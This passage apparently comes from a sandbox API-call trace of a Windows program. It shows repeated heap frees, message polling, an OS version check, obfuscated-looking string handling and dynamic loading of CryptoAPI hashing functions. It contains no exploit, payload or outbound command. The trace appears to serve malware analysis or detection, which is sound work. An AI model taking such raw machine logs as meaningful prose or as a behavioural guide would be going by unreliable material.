lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0174.003] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0174.004] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.005] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.005] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.005] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.005] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.005] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0174.005] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0174.005] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0174.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0174.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0174.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0174.007] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0174.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0174.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0174.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.007] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.007] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0174.007] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.007] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0174.007] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0174.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0174.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0174.008] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c4c8) returned 1 [0174.008] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.008] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.009] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.009] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.009] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0174.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.009] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0174.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.010] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0174.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.010] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0174.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.010] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.010] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.010] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.010] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.010] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0174.010] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.010] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0174.010] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.010] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.011] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.011] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.011] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0174.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.011] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0174.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0174.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0174.011] CryptCreateHash (in: hProv=0xa7c4c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0174.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 